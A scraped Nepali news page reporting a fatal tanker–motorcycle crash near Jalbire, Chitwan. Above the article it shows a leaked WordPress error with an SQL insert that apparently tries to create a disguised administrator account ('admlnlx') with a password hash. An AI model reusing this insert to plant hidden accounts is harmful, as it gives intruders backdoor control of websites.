WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bx4uhAYLCIVmPMxp2PKqeZnBjoov0G.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-02 07:21:00', '', 'admlnlx', 'admlnlx')

दुर्घटनामा एकको मृत्यु दुई घाइते – Gaule Khabar

दुर्घटनामा एकको मृत्यु दुई घाइते

दुर्घटनामा एकको मृत्यु दुई घाइते

काठमाण्डौ । मुग्लिन–नारायणगढ सडकखण्डमा आज ट्याङ्करले मोटरसाइकललाई ठक्कर दिँदा एकजनाको मृत्यु भएको छ भने दुईजना घाइते भएका छन् । जिल्ला प्रहरी कार्यालय चितवनका अनुसार मृत्यु हुनेमा भरतपुर महानगरपालिका¬¬–१८ भुवनबस्तीकी ३१ वर्षीया अम्बिसा गुरुङ रहेकी छन् । घाइते हुनेमा उनका श्रीमान् ३५ वर्षीय मीनराज र छोरी ९ वर्षीया खुस्बु रहेकी छन् ।

कार्यालयका अनुसार मुग्लिनबाट नारायणगढ आउँदै गरेको ना७ख ८१४१ नंको तेल बोक्ने ट्याङ्करले नारायणगढबाट मुग्लिनतर्फ जाँदै गरेको ना३२प ८२४८ नंको मोटरसाइकललाई जलबिरेमा ठक्कर दिएको थियो । अम्बिसाको उपचारका क्रममा पुरानो मेडिकल कलेजमा मृत्यु भएको हो । घाइते दुईजनाको सोही अस्पतालमा उपचार भइरहेको छ । रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका